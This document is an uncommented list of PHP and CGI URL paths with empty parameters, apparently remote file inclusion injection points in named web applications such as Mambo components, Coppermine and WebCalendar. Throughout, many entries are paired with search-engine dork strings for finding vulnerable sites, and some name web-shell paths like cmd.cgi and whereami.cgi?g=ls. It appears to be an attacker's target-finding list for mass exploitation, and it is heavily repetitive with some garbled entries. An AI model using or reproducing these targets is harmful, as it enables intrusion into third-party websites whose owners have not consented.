show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?body=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?body=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?body=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=

principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefix
dotproject/modules/projects/addedit.php?root_dir=
dotproject/modules/projects/view.php?root_dir=
dotproject/modules/projects/vw_files.php?root_dir=
dotproject/modules/tasks/addedit.php?root_dir=
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGery/public/displayCategory.php?basepath=
modules/My_eGery/public/displayCategory.php?basepath=
modules/4nAlbum/public/displayCategory.php?basepath=
modules/coppermine/themes/default/theme.php?THEME_DIR=
modules/agendax/addevent.inc.php?agendax_path=
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
modules/xgery/upgrade_album.php?GERY_BASEDIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
shoutbox/expanded.php?conf=
library/editor/editor.php?root=
library/lib.php?root=
e107/e107_handlers/secure_img_render.php?p=
main.php?x=
*default.php?page=
*default.php?body=
*index.php?url=
*index.php?arquivo=
index.php?include=
index.php?visualizar=
index.php?pagina=
index.php?page=
index.php?p=
index.php?cont=
index.php?x=
index.php?cat=
index.php?site=
index.php?configFile=
index.php?do=
index2.php?x=
Index.php?id=
template.php?pagina
inc/step_one_tables.php?server_inc=
GradeMap/index.php?page=
admin.php?cal_dir=
path_of_cpcommerce/_functions.php?prefix=
contacts.php?cal_dir=
convert-date.php?cal_dir=
album_portal.php?phpbb_root_path=
mainfile.php?MAIN_PATH=
dotproject/modules/files/index_table.php?root_dir=
gery/init.php?HTTP_POST_VARS=
pm/lib.inc.php?pm_path=
ideabox/include.php?gorumDir=
cgi-bin/index.cgi?page=
cgi-bin/awstats.pl?update=1&logfile=
cgi-bin/awstats/awstats.pl?configdir
cgi-bin/ikonboard.cgi
cgi-bin/acart/acart.pl?&page=
cgi-bin/quikstore.cgi?category=
cgi-bin/ubb/ubb.cgi?g=
cgi-bin/hinsts.pl?
cgi-bin/bp/bp-lib.pl?g=
ccbill/whereami.cgi?g=ls
cgi-bin/telnet.cgi
cgi-bin/1/cmd.cgi
calendar.pl?command=login&fromTemplate=
encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
events.cgi?t=
powerup.cgi?a=latest&t=
lc.cgi?a=
news.cgi?a=114&t=
biznews.cgi?a=33&t=
jobs.cgi?a=9&t=
articles.cgi?a=34&t=
events.cgi?a=155&t=
latinbitz.cgi?t=
newsdesk.cgi?t=
media.cgi?a=11&t=
reporter.cgi?t=
news.cgi?t=
newsupdate.cgi?a=latest&t=
deportes.cgi?a=latest&t=
news.cgi?a=latest&t=
whereami.cgi?g=id
auktion.pl?menue=
i-m/i-m.cgi?p=
vote.pl?action=show&id=
shop.pl/page=
newsdesk.cgi?a=latest&t=
fileseek.cgi?head=&foot=
cgi-bin/probe.cgi?olddat=
emsgb/easymsgb.pl?print=
app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=
csv_db/csv_db.cgi?fil e=file.extention
cgi-bin/jammail.pl?job=showoldmail&mail=
cgi-bin/bbs/read.cgi?file=
support_page.cgi?file_name=
index.php?include=
index.php?open=
index.php?visualizar=
main.php?x=
main.php?page=
index.php?meio.php=
index.php?page=
index.php?action=
index5.php?configFile=
index5.php?page=
index5.php?content=
index5.php?x=
index5.php?open=
index5.php?m=
index5.php?site=
index5.php?cat=
index.php?d=
index.php?a=
index.php?b=
index.php?c=
index.php?e=
index.php?f=
index.php?g=
index.php?h=
index.php?i=
index.php?j=
index.php?k=
index.php?l=
index.php?m=
index.php?n=
index.php?o=
index.php?p=
index.php?q=
index.php?r=
index.php?s=
index.php?t=
index.php?u=
index.php?v=
index.php?x=
indishell.in
index.php?y=
index.php?z=
index.php?loc=
index.php?seite=
index2.php?d=
index2.php?a=
index.php?ir=
index.php?secao=
index2.php?b=
index2.php?c=
index2.php?e=
index2.php?f=
index2.php?g=
index2.php?h=
index2.php?i=
index2.php?j=
index2.php?k=
index2.php?l=
index2.php?m=
index2.php?n=
index2.php?o=
index2.php?p=
index2.php?q=
index2.php?r=
index2.php?s=
index2.php?t=
index2.php?u=
index2.php?v=
index2.php?x=
index2.php?y=
index2.php?z=
index5.php?inc=
index5.php?pg=
index5.php?lv1=
index.php?sub=
index.php?sub2=
index.php?pg=
index.php?lv1=
index.php?directfile=
index.php?funcion=
index.php?ll=
index.php?lnk=
index5.php?main=
index5.php?include=
index5.php?root=
index5.php?pagina=
index.php?theme=
index.php?acao=
index5.php?cont=
index5.php?pag=
index5.php?p=
index5.php?lang=
index5.php?language=
template.php?pagina=
llindex.php?sub=
index2.php?pg=
index2.php?lv1=
index2.php?sub=
index2.php?directfile=
index2.php?funcion=
index2.php?sub2=
index2.php?ll=
index2.php?lnk=
index5.php?body=
index5.php?visualizar=
index5.php?do=
index2.php?theme=
index2.php?acao=
index2:php?aa=
index3:php?aa=
index.php?server=
index.php?cal=
index.php?prefix=
index.php?root_PATH=
index.php?path=
index.php?gorumdir=
index2.php?cont=
index2.php?server=
index2.php?cal=
index2.php?prefix=
index2.php?root_PATH=
index2.php?path= AKI
exibir.php?abre=
exibir.php?page=
exibir.php?get=
exibir.php?p=
exibir.php?lang=
index2.php?gorumdir=
index2.php?pag=
index2.php?lang=
index2.php?language=
index2.php?content=
index.php?middle=
step_one_tables.php?server_inc=
grademade/index.php?page=
phpshop/index.php?base_dir=
admin.php?cal_dir=
_functions.php?prefix=
contacts.php?cal_dir=
convert-date.php?cal_dir=
album_portal.php?phpbb_root_path=
mainfile.php?MAIN_PATH=
index_table.php?root_dir=
affich.php?base=
init.php?HTTP_POST_VARS=
lib.inc.php?pm_path=
include.php?gorumDir=
start_lobby.php?CONFIG[MWCHAT_Libs]=
index.php?configFile=
module_db.php?pivot_path=
index.php?lng=../../include/main.inc&G_PATH=
initdb.php?absolute_path=
step_one.php?server_inc=
pipe.php?HCL_path=
write.php?dir=
new-visitor.inc.php?lvc_include_dir=
header.php?systempath=
theme.php?THEME_DIR=
index.php?pageurl=
expanded.php?conf=
addevent.inc.php?agendax_path=
Packages.php?sourcedir=
_functions.php?prefix
addedit.php?root_dir=
view.php?root_dir=
vw_files.php?root_dir=
viewgantt.php?root_dir=
displayCategory.php?basepath=
default/theme.php?THEME_DIR=
upgrade_album.php?GERY_BASEDIR=
init.inc.php?CPG_M_DIR=
mod_mainmenu.php?mosConfig_absolute_path=
editor.php?root=
lib.php?root=
secure_img_render.php?p=
default.php?page=
arquivo.php?data=
word.php?id=
mod.php?mod=
index.php?plugin=
sendpage.php?page=
index.php?hl=
modules.php?op=
index.php?templateid=
article.php?sid=
.php?my=”
.php?a=”
.php?f=”
.php?z=”
.php?zo=”
.php?la=”
.php?perm=”
.php?item_id=”
.php?f_content=”
.php?from=”
.php?mid=”
.php?lest=”
.php?east=”
.gov.br/index.php?arquivo=
index.php?ver=
/contenido/classes/class.inuse.php
news.php?CONFIG[script_path]=
index.php?vpagina=
index.php?arq=
index.php?pg_ID=
index.php?pg=
home.php?page=
*/newbb/print.php?forum=*topic_id=*”
*/newbb_plus/*=”
*/news/archive.php?op=*year=*month=*”
.php?abrir=”
.php?act=”
.php?action=”
.php?ad=”
.php?archive=”
.php?area=”
.php?article=”
.php?b=”
*/tsep/include/colorswitch.php?tsep_config[absPath]=*”
.php?back=”
.php?base=”
.php?basedir=”
.php?bbs=”
.php?board_no=”
.php?body=”
.php?c=”
.php?cal_dir=”
.php?cat=”
/include/init.inc.php?CPG_M_DIR=”
/includes/mx_functions_ch.php?phpbb_root_path=”
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=”
.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=”
.php?subd=”
.php?subdir=”
.php?category=”
.php?choice=”
.php?class=”
.php?club_id=”
.php?cod.tipo=”
.php?cod=”
.php?conf=”
.php?configFile=”
.php?cont=”
.php?corpo=”
.php?cvsroot=”
.php?d=”
.php?da=”
.php?date=”
.php?debug=”
.php?debut=”
.php?default=”
.php?destino=”
.php?dir=”
.php?display=”
.php?file_id=”
.php?file=”
.php?filepath=”
.php?flash=”
.php?folder=”
.php?for=”
.php?form=”
.php?formatword=”
.php?funcao=”
.php?function=”
.php?g=”
.php?get=”
.php?go=”
.php?gorumDir=”
.php?goto=”
.php?h=”
.php?headline=”
.php?i=”
.php?inc=”
.php?include=”
.php?includedir=”
.php?inter=”
.php?itemid=”
.php?j=”
.php?join=”
.php?jojo=”
.php?l=”
.php?lan=”
.php?lang=”
.php?link=”
.php?load=”
.php?loc=”
.php?m=”
.php?main=”
.php?meio.php=”
.php?meio=”
.php?menu=”
.php?menuID=”
.php?mep=”
.php?month=”
.php?mostra=”
.php?n=”
.php?name=”
.php?nav=”
.php?new=”
.php?news=”
.php?next=”
.php?nextpage=”
.php?o=”
.php?op=”
.php?open=”
.php?option=”
.php?origem=”
.php?Page_ID=”
.php?pageurl=”
.php?para=”
.php?part=”
.php?pg=”
.php?pid=”
.php?place=”
.php?play=”
.php?plugin=”
.php?pm_path=”
.php?pollname=”
.php?post=”
.php?pr=”
.php?prefix=”
.php?prefixo=”
.php?q=”
.php?redirect=”
.php?ref=”
.php?refid=”
.php?regionId=”
.php?release_id=”
indishell.in
.php?release=”
.php?return=”
.php?root=”
.php?S=”
.php?searchcode_id=”
.php?sec=”
.php?secao=”
.php?sect=”
.php?sel=”
.php?server=”
.php?servico=”
.php?sg=”
.php?shard=”
.php?show=”
.php?sid=”
.php?site=”
.php?sourcedir=”
.php?start=”
.php?storyid=”
.php?str=”
.php?subject=”
.php?sufixo=”
.php?systempath=”
.php?t=”
.php?task=”
.php?teste=”
.php?theme_dir=”
.php?thread_id=”
.php?tid=”
.php?title=”
.php?to=”
.php?topic_id=”
.php?type=”
.php?u=”
.php?url=”
.php?urlFrom=”
.php?v=”
.php?var=”
.php?vi=”
.php?view=”
.php?visual=”
.php?wPage=”
.php?y=”
/components/com_forum/download.php?phpbb_root_path= com_forum
[Script Path]/admin/index.php?o= admin/index.php”
/admin/index.php?o= admin/index.php”
index.php?menu=deti&page= index.php?menu=deti&page”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
/classes/adodbt/sql.php?classes_dir= “index2.php?option=rss”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
index.php?RP_PATH= reviewpost
index.php?pagename= phpquiz
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “com_phpshop”
/tools/send_reminders.php?includedir= day.php?date=
SQuery/lib/gore.php?libpath= “/SQuery/”
m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
wamp_dir/setup/yesno.phtml?no_url= “setup”
components/com_forum/download.php?phpbb_root_path= “com_forum”
index.php?p= “/index.php?p=*.php”
index.php?pag= “/index.php?pag=*.php”
template.php?page= “/template.php?page=*.php”
main.php?page= “/main.php?page=*.php”
index2.php?pag= “/index2.php?pag=*.php”
home.php?pag= “/home.php?pag=*.php”
index.php?page= “/index.php?page=*.php”
default.php?page= “/default.php?page=*.php”
inc/cmses/aedatingCMS.php?dir[inc]= “flashchat”
/modules/vwar/admin/admin.php?vwar_root= vwar
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum
encapscms_PATH/core/core.php?root= encapscms_PATH
inc/session.php?sessionerror=0&lang= inc
path/index.php?function=custom&custom= path
[MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]
/inc/irayofuncs.php?irayodirhack= “/inc/”
index.php?function=custom&custom= custom
cyberfolio/portfolio/msg/view.php?av= cyberfolio
/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT
*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
*pivot/modules/module_db.php?pivot_path=
*inc/header.php/step_one.php?server_inc=
*inst/index.php?lng=../../include/main.inc&G_PATH=
*inc/pipe.php?HCL_path=
*include/new-visitor.inc.php?lvc_include_dir=
*includes/header.php?systempath=
*support/mailling/maillist/inc/initdb.php?absolute_path=
*coppercop/theme.php?THEME_DIR=
*zentrack/index.php?configFile=
*include/write.php?dir=
include/new-visitor.inc.php?lvc_include_dir=
includes/header.php?systempath=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
becommunity/community/index.php?pageurl=
shoutbox/expanded.php?conf=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefix
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGery/public/displayCategory.php?basepath=
modules/My_eGery/public/displayCategory.php?basepath=
modules/4nAlbum/public/displayCategory.php?basepath=
modules/coppermine/themes/default/theme.php?THEME_DIR=
modules/agendax/addevent.inc.php?agendax_path=
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
modules/xgery/upgrade_album.php?GERY_BASEDIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
modules/mod_mainmenu.php?mosConfig_absolute_path=
pivot/modules/module_db.php?pivot_path=
library/editor/editor.php?root=
library/lib.php?root=
e107/e107_handlers/secure_img_render.php?p=
main.php?x=
main.php?page=
*default.php?page=
*default.php?body=
default.php?page=
*index.php?url=
*index.php?arquivo=
index.php?meio.php=
index.php?include=
index.php?open=
index.php?visualizar=
index.php?pagina=
index.php?inc=
index.php?page=
index.php?pag=
index.php?p=
index.php?content=
index.php?cont=
index.php?c=
index.php?meio=
index.php?x=
index.php?cat=
index.php?site=
index.php?configFile=
index.php?action=
index.php?do=
index2.php?x=
Index.php?id=
index2.php?content=
template.php?pagina
inc/step_one_tables.php?server_inc=
phpshop/index.php?base_dir=
admin.php?cal_dir=
path_of_cpcommerce/_functions.php?prefix=
contacts.php?cal_dir=
convert-date.php?cal_dir=
album_portal.php?phpbb_root_path=
mainfile.php?MAIN_PATH=
dotproject/modules/files/index_table.php?root_dir=
html/affich.php?base=
gery/init.php?HTTP_POST_VARS=
pm/lib.inc.php?pm_path=
ideabox/include.php?gorumDir=
modules/tasks/viewgantt.php?root_dir=
cgi-bin/index.cgi?page=
cgi-bin/awstats.pl?update=1&logfile=
cgi-bin/awstats/awstats.pl?configdir
cgi-bin/ikonboard.cgi
cgi-bin/acart/acart.pl?&page=
cgi-bin/quikstore.cgi?category=
cgi-bin/ubb/ubb.cgi?g=
cgi-bin/hinsts.pl?
cgi-bin/bp/bp-lib.pl?g=
ccbill/whereami.cgi?g=ls
cgi-bin/telnet.cgi
cgi-bin/1/cmd.cgi
encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=
cgi-sys/guestbook.cgi?user=cpanel&template=
account.php?action= account.php?action=
account.php?action= iurl:”account.php?action=”
account.php?action= iurl:”.php?action=”
account.php?action= .php?action=
accounts.php?command= .php?command=”
addmedia.php?factsfile[$LANGUAGE]= phpGedView
.php?p=”
announcements.php?phpraid_dir= “phpraid”
announcements.php?phpraid_dir= “phpraid signup”
announcements.php?phpraid_dir= php raid
announcements.php?phpraid_dir= phpraid
announcements.php?phpraid_dir= phpraid signup
arg.php?arg= .php?arg=
args.php?arg= .php?arg=
atom.php5?page= .php5?id=
auto.php?inc= .php?inc=”
auto.php?page= auto.php?page=
base.php?f1= base.php?f1=”
base.php?f1= .php?f1=”
board.php?see= board.php?see=”
board.php?see= .php?see=”
book.php5?page= php5?page=
/calendar.php?l= calendar.php?l=”
/calendar.php?l= calendar.php?l=
/calendar.php?p= calendar.php?p=”
/calendar.php?p= calendar.php?p=
/calendar.php?pg= calendar.php?pg=”
/calendar.php?pg= calendar.php?pg=
/calendar.php?s= calendar.php?s=”
/calendar.php?s= calendar.php?s=
/addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/”
/addpost_newpoll.php?addpoll=preview&thispath= /ubbthreads/
/addpost_newpoll.php?addpoll=preview&thispath= “/ubbthreads/”
/addpost_newpoll.php?addpoll=preview&thispath= “ubbthreads”
/addpost_newpoll.php?addpoll=preview&thispath= ubbthreads
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= “com_remository”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= “com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= “Mambo”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= “com_serverstat”
canal.php?meio= .php?meio=”
/classes/adodbt/sql.php?classes_dir= “adobt”
/classes/adodbt/sql.php?classes_dir= adobt
/classes/adodbt/sql.php?classes_dir= adobt
/classified_right.php?language_dir= “classified.php”
/classified_right.php?language_dir= classified.php
/classified_right.php?language_dir= classified.php phpbazar
/classified_right.php?language_dir= “phpbazar”
/classified_right.php?language_dir= phpbazar
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “phpCOIN”
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “phpCOIN 1.2.3″
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN 1.2.3″
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= “com_extended_registration”
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms”
/components/com_facileforms/facileforms.frame.php?ff_compath= “com_facileforms”
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms
components/com_performs/performs.php?mosConfig_absolute_path= com_performs
components/com_performs/performs.php?mosConfig_absolute_path= “com_performs”
/components/com_zoom/includes/database.php?mosConfig_absolute_path= “com_zoom”
/components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom
/components/com_zoom/includes/database.php?mosConfig_absolute_path= “index.php?option=”com_zoom”
content.php?page= “content.php?page=*.php”
/embed/day.php?path= “Calendar”
/embed/day.php?path= Calendar
/embed/day.php?path= intitle:”Login to Calendar”
/embed/day.php?path= “Login to Calendar”
/embed/day.php?path= Login to Calendar
/embed/day.php?path= “WebCalendar”
/embed/day.php?path= WebCalendar
enc/content.php?Home_Path= “doodle”
enc/content.php?Home_Path= doodle
enc/content.php?Home_Path= “doodle cart”
enc/content.php?Home_Path= doodle cart
enc/content.php?Home_Path= “powered by doodle cart”
enc/content.php?Home_Path= powered by doodle cart
/header.php?abspath= “MobilePublisherPHP”
/header.php?abspath= MobilePublisherPHP
impex/ImpExData.php?systempath= intext:powered by vbulletin
impex/ImpExData.php?systempath= powered by vbulletin
impex/ImpExData.php?systempath= “vbulletin”
impex/ImpExData.php?systempath= vbulletin
/includes/dbal.php?eqdkp_root_path= “EQdkp”
/includes/dbal.php?eqdkp_root_path= EQdkp
/includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
/includes/dbal.php?eqdkp_root_path= powered by EQdkp
/includes/kb_constants.php?module_root_path= “Base”
/includes/kb_constants.php?module_root_path= Base
/includes/kb_constants.php?module_root_path= “Knowledge”
/includes/kb_constants.php?module_root_path= Knowledge
/includes/kb_constants.php?module_root_path= “Knowledge Base”
/includes/kb_constants.php?module_root_path= Knowledge Base
/includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
/includes/kb_constants.php?module_root_path= Powered by Knowledge Base
index1.php?= “index1.php?=”
index1.php?= index1.php?=
index1.php?= “index1.php?=*.php?
index2.php?= “index2.php?=”
index2.php?= index2.php?=
index2.php?= “index2.php?=*.php?”
index.php?body= index.php?body=
index.php?body= “index.php?body=”
index.php?go1= index.php?go1=
index.php?go1= “index.php?go1=”
index.php?go= “index.php?go=”
index.php?go= index.php?go=
index.php?pageurl= “index.php?pageurl=”
index.php?pageurl= “index.php?pageurl=*.php”
index.php?pageurl= index.php?pageurl=*.php
index.php?pageurl= “index.php?pageurl=*.php
index.php?pagina1= “index.php?pagina1=”
index.php?pagina1= index.php?pagina1=
index.php?pagina= “index.php?pagina=”
index.php?pagina= “index.php?pagina=*.php”
index.php?site1= index.php?site1=
index.php?site1= “index.php?site1=”
index.php?site= “index.php?site=”
index.php?site= index.php?site=
index.php?var1= “index.php?var1=”
index.php?var1= index.php?var1=
index.php?var2= index.php?var2=
index.php?var= index.php?va21=
index.php?var= index.php?var=
index.php?var= “index.php?var1=”
index.php?var= index.php?var1=
index.php?var= “index.php?var2=”
index.php?var= index.php?var2=
index.php?var= “index.php?var=*.php”
index.php?var= index.php?var=*.php
/login.php?dir= login.php?dir=
/login.php?dir= “login.php?dir=”
/login.php?dir= login.php?dir=
main.php?id= “main.php?id=*.php”
/main.php?sayfa= “main.php?sayfa=”
/main.php?sayfa= main.php?sayfa=
/mcf.php?content= mcf.php”
mcf.php?content= mcf.php”
mcf.php?content= “mcf.php”
mcf.php?content= mcf.php
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
/modules/TotalCalendar/about.php?inc_dir= “TotalCalendar”
/modules/TotalCalendar/about.php?inc_dir= TotalCalendar
/modules/vwar/admin/admin.php?vwar_root= “vwar”
/modules/vwar/admin/admin.php?vwar_root= vwar
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= “index.php?id=”
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= “phpwcms/index.php?id=”
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=
skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer”
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer
skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= “CMS”
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
/skin/zero_vote/error.php?dir= “skin/zero_vote/error.php”
/skin/zero_vote/error.php?dir= skin/zero_vote/error.php
/sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
/sources/functions.php?CONFIG[main_path]= “Powered By ScozNews”
/sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)
/sources/functions.php?CONFIG[main_path]= Powered By ScozNews
/sources/functions.php?CONFIG[main_path]= “ScozNews”
/sources/functions.php?CONFIG[main_path]= ScozNews
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Aardvark”
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Aardvark TopSites”
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Aardvark TopSites
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2
/sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
/sources/template.php?CONFIG[main_path]= (Powered By ScozNews)
/sources/template.php?CONFIG[main_path]= Powered By ScozNews
/sources/template.php?CONFIG[main_path]= “ScozNews”
/sources/template.php?CONFIG[main_path]= ScozNews
/surveys/survey.inc.php?path= surveys
/surveys/survey.inc.php?path= “surveys”
/tags.php?BBCodeFile= intitle:”Tagger LE”
/tags.php?BBCodeFile= intitle:”Tagger LE” tags.php
/tags.php?BBCodeFile= “Tagger LE”
/tags.php?BBCodeFile= Tagger LE
/tags.php?BBCodeFile= “tags.php”
/tags.php?BBCodeFile= tags.php
/templates/headline_temp.php?nst_inc= intitle:fusion:news:management
/templates/headline_temp.php?nst_inc= ‘fusion”
/templates/headline_temp.php?nst_inc= “fusion”
/templates/headline_temp.php?nst_inc= fusion
/templates/headline_temp.php?nst_inc= fusion:news:management:system
/templates/headline_temp.php?nst_inc= “management”
/templates/headline_temp.php?nst_inc= management
/templates/headline_temp.php?nst_inc= “news”
/templates/headline_temp.php?nst_inc= news
/templates/headline_temp.php?nst_inc= “system”
/templates/headline_temp.php?nst_inc= system
/tools/send_reminders.php?includedir= “day.php?date=”
/tools/send_reminders.php?includedir= day.php?date=
/ws/get_events.php?includedir= /WebCalendar/
/ws/get_events.php?includedir= “/WebCalendar/”
/ws/get_events.php?includedir= “WebCalendar”
/zipndownload.php?PP_PATH= “PhotoPost”
/zipndownload.php?PP_PATH= PhotoPost
/zipndownload.php?PP_PATH= “PhotoPostP”
/zipndownload.php?PP_PATH= “PhotoPost PHP”
/zipndownload.php?PP_PATH= “PhotoPost PHP 4.6″
/zipndownload.php?PP_PATH= PhotoPost PHP 4.6
/zipndownload.php?PP_PATH= “Powered by: PhotoPost PHP 4.6″
/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6
